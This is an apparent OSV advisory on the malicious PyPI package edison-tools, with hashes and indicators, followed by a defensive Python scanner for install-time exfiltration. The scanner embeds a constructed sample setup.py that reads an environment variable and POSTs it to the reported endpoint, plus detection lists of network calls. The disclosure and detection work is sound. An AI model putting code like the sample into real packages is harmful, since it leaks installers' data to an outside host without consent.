{"id":"MAL-2026-4747","summary":"Malicious code in edison-tools (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7)\nAt `pip install` time, setup.py reads the `EDISON_QUERY` environment variable from the installer's environment and POSTs it to `https://edison-k8.vercel.app/query`, an author-controlled Vercel endpoint that proxies requests to Google Gemini. The HTTP response is written verbatim into `edison_tools/data.py` and exposed through the package's public `query()` API. Two distinct installer-side harms: (1) install-time outbound network with no opt-in, carrying any value the user has placed in `EDISON_QUERY` to the author's infrastructure; (2) the advertised `query()` function silently relays caller-supplied prompts through the author's hardcoded Vercel endpoint, meaning every consumer of the API funnels their queries (and any sensitive content therein) through the author's account, where they can be logged or modified. The destination, model selection, and account credentials are not configurable — the relay is the package's only mechanism. 
This matches the silent-relay pattern: normal use of the documented API leaks caller-supplied data to a hardcoded third-party destination.\n","modified":"2026-05-27T00:32:10.042268286Z","published":"2026-05-25T22:32:48Z","withdrawn":"2026-05-26T21:29:31Z","database_specific":{"malicious-packages-origins":[{"versions":["0.1.16"],"sha256":"6cd7720e280f30a1f1bd0abcf852773433c1b7b5dea2644f0115d26c6b32c1c6","import_time":"2026-05-26T05:53:17.070203319Z","source":"amazon-inspector","id":"IN-MAL-2026-004789","modified_time":"2026-05-25T23:02:46Z"},{"versions":["0.1.15"],"import_time":"2026-05-26T05:53:17.493092876Z","sha256":"9beb62fe1d724d01013dd33f1a9a81c6f7ba2633a743f2d309255a5db6f9c47a","id":"IN-MAL-2026-004793","source":"amazon-inspector","modified_time":"2026-05-25T23:02:50Z"},{"versions":["0.1.13"],"sha256":"a3ad372a3654885f96211b8b52f6ccfbd175eb1e058d80298510977cc9a58a40","import_time":"2026-05-26T05:53:16.41905842Z","source":"amazon-inspector","id":"IN-MAL-2026-004783","modified_time":"2026-05-25T22:32:48Z"},{"versions":["0.1.22"],"sha256":"a4253ecedd23f08a9811050e2e9baf04b4b286ab4d7f8502dd78f98d989dae07","import_time":"2026-05-26T05:53:18.036253437Z","source":"amazon-inspector","id":"IN-MAL-2026-004798","modified_time":"2026-05-25T23:32:53Z"},{"versions":["0.1.13"],"import_time":"2026-05-26T05:53:16.530048546Z","sha256":"b9a1d7c28c03b928aed4a199fa84be49c9738b20af4046bbbcafdc0c0e067359","id":"IN-MAL-2026-004784","source":"amazon-inspector","modified_time":"2026-05-25T22:32:48Z"},{"versions":["0.1.17"],"sha256":"c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7","import_time":"2026-05-26T05:53:17.166888816Z","id":"IN-MAL-2026-004790","source":"amazon-inspector","modified_time":"2026-05-25T23:02:48Z"},{"versions":["0.1.15"],"import_time":"2026-05-26T05:53:17.35598976Z","sha256":"d65d9f3a130fab5042590792c7f1188d89f651a80d7900f3ef06c763fbed2ec5","id":"IN-MAL-2026-004792","source":"amazon-inspector","modified_time":"2026-05-25T23:02:50Z"},{"versions":["0
.1.16"],"sha256":"daf5c6af6e8e5d7fc4d418fdb27cf3dc4282cb1b8783fb2788948fce9cf046fe","import_time":"2026-05-26T05:53:16.97779052Z","source":"amazon-inspector","id":"IN-MAL-2026-004788","modified_time":"2026-05-25T23:02:45Z"},{"versions":["0.1.17"],"sha256":"9a53a5b561428a99d075d87fb1844c5ded02b566e9feb2b7ad442d0ff4c5d729","import_time":"2026-05-26T05:53:17.262351437Z","id":"IN-MAL-2026-004791","source":"amazon-inspector","modified_time":"2026-05-25T23:02:48Z"}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.13/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.22/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.17/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.15/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.16/"}],"affected":[{"package":{"name":"edison-tools","ecosystem":"PyPI","purl":"pkg:pypi/edison-tools"},"versions":["0.1.16","0.1.15","0.1.13","0.1.22","0.1.17"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious 
Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/pypi/edison-tools/MAL-2026-4747.json","indicators":{"evidence_files":[{"path":"setup.py","sha256":"412d7e6db4fad778fab0a18dc8a4c6f5811c09e31ead1a17433cec84fb42d0dd","tlsh":"9e11020a40a31870e9e7d7f5847b35913522e9173e04b45c78de16d40f4f065a653495"},{"path":"PKG-INFO","sha256":"31bd0bcea6def6150b6766a474d63b49e1b473c256c3567f5848d26f9de42a6f","tlsh":"1a90020092116071c4299a8700588744c2f41b4675ae14bd88575ed1938b14c6050130"}],"domains":["edison-k8.vercel.app"],"package_integrity":[{"hashes":{"sha256":"fb0586998ac14514648bc76674e4218830be8b5a82364eda5570a569f808566d","md5":"922b470796d9a71a51aa59a6eecefb8c","blake2b_256":"9a2dd7b3c26d193852bd561beb3996ebce7024745dd2cbcd9c9a0e1a40cc031f"},"filename":"edison_tools-0.1.13-py3-none-any.whl"},{"hashes":{"sha256":"d491422733f32efb3f723dd1778b12f8d39103284e56aaed675a9d7a39ba9166","md5":"74c037e253c2e336c45ec58ffa97c408","blake2b_256":"51af07199677b642434aab60a684cb862d3dd44c5c6127e77d5879614131505a"},"filename":"edison_tools-0.1.13.tar.gz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}
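Triage aid appended after the record. The details field above describes the install-time half of the problem: setup.py reads an environment variable, POSTs it to a hardcoded endpoint and writes the response into the package. Those three signals (environment read, outbound network call, file write during `pip install`) can be flagged statically from the sdist without ever executing setup.py. The following script is an added example and is not code from the edison-tools package, from Amazon Inspector, or from the OSV entry; the sample `SAMPLE_SETUP_PY` is constructed to model the behaviour the record describes and is not the real setup.py, and only the endpoint URL and the `EDISON_QUERY` variable name are taken from the record. It resolves import aliases so `import requests as r; r.post(...)` is still caught, and treats a hardcoded http(s) literal as the candidate exfiltration destination.

```python
"""Static triage of a sdist's setup.py for the install-time exfiltration pattern
described above. Added example, not code from edison-tools or the OSV record."""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Constructed sample modelled on the advisory's description; NOT the real
# edison-tools setup.py. Only the endpoint and variable name come from the record.
SAMPLE_SETUP_PY = '''
import os, json
import urllib.request
from setuptools import setup

prompt = os.environ.get("EDISON_QUERY", "")
req = urllib.request.Request("https://edison-k8.vercel.app/query",
                             data=json.dumps({"q": prompt}).encode())
body = urllib.request.urlopen(req).read().decode()
with open("edison_tools/data.py", "w") as fh:
    fh.write("DATA = " + repr(body) + "\\n")
setup(name="edison-tools", version="0.1.17", packages=["edison_tools"])
'''
# Constructed benign control: declarative metadata only, no side effects.
BENIGN_SETUP_PY = "from setuptools import setup\nsetup(name='example', version='1.0')\n"

ENV_READS = {"os.environ.get", "os.getenv"}
NETWORK_CALLS = {"urllib.request.urlopen", "urllib.request.Request", "urllib3.PoolManager",
                 "requests.get", "requests.post", "requests.put", "requests.request",
                 "http.client.HTTPSConnection", "http.client.HTTPConnection",
                 "socket.socket", "socket.create_connection"}


@dataclass(frozen=True)
class Finding:
    kind: str    # env_read | network | file_write | url
    detail: str  # resolved call name, URL literal, or written path
    line: int


def _dotted(node: ast.AST) -> str | None:
    """'a.b.c' for a Name/Attribute chain; None when the chain starts with a call etc."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_map(tree: ast.AST) -> dict[str, str]:
    """Bound name -> fully qualified origin, so 'import requests as r' is not missed."""
    names: dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                names[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                names[a.asname or a.name] = f"{node.module}.{a.name}"
    return names


def _resolve(name: str, imports: dict[str, str]) -> str:
    head, _, rest = name.partition(".")
    full = imports.get(head, head)
    return f"{full}.{rest}" if rest else full


def _opens_for_write(call: ast.Call) -> bool:
    """True when open()'s mode (positional or keyword) can create or modify a file."""
    mode = call.args[1] if len(call.args) > 1 else None
    mode = next((k.value for k in call.keywords if k.arg == "mode"), mode)
    return isinstance(mode, ast.Constant) and isinstance(mode.value, str) and bool(set(mode.value) & set("wax+"))


def scan_setup_py(source: str) -> list[Finding]:
    """Walk the AST once and collect the signals a reviewer wants for install-time code."""
    tree = ast.parse(source)
    imports = _import_map(tree)
    out: list[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and (name := _dotted(node.func)):
            full = _resolve(name, imports)
            if full in ENV_READS:
                out.append(Finding("env_read", full, node.lineno))
            elif full in NETWORK_CALLS:
                out.append(Finding("network", full, node.lineno))
            elif full == "open" and node.args and _opens_for_write(node):
                path = node.args[0].value if isinstance(node.args[0], ast.Constant) else "<dynamic>"
                out.append(Finding("file_write", str(path), node.lineno))
        elif isinstance(node, ast.Subscript) and (name := _dotted(node.value)) \
                and _resolve(name, imports) == "os.environ":
            out.append(Finding("env_read", "os.environ[...]", node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith(("http://", "https://")):
            out.append(Finding("url", node.value, node.lineno))
    return sorted(out, key=lambda f: f.line)


def triage(source: str) -> dict:
    """Collapse findings into the first questions asked: does install phone home, with what?"""
    findings = scan_setup_py(source)
    kinds = {f.kind for f in findings}
    return {
        "install_time_network": "network" in kinds,
        "env_exfil": "network" in kinds and "env_read" in kinds,  # the advisory's pattern
        "destinations": [f.detail for f in findings if f.kind == "url"],
        "writes": [f.detail for f in findings if f.kind == "file_write"],
    }


if __name__ == "__main__":
    print(triage(SAMPLE_SETUP_PY))
    print(triage(BENIGN_SETUP_PY))
```

Run it against the `setup.py` extracted from the sdist (`tar xzf edison_tools-<ver>.tar.gz` and point `scan_setup_py` at the file's contents) rather than the wheel: a `py3-none-any` wheel has no setup.py and skips the install-time step, so the install-side harm is only visible in the sdist, while the second harm in the record, `query()` relaying callers' prompts through the hardcoded endpoint, lives in the installed module and needs the same URL-literal and network-call check applied to `edison_tools/*.py`. The scanner is deliberately narrow: it resolves static dotted names only, so `getattr(__import__("os"), "environ")`, base64-wrapped strings or `exec` of downloaded code will not match, and a hit means "review this file", not a verdict.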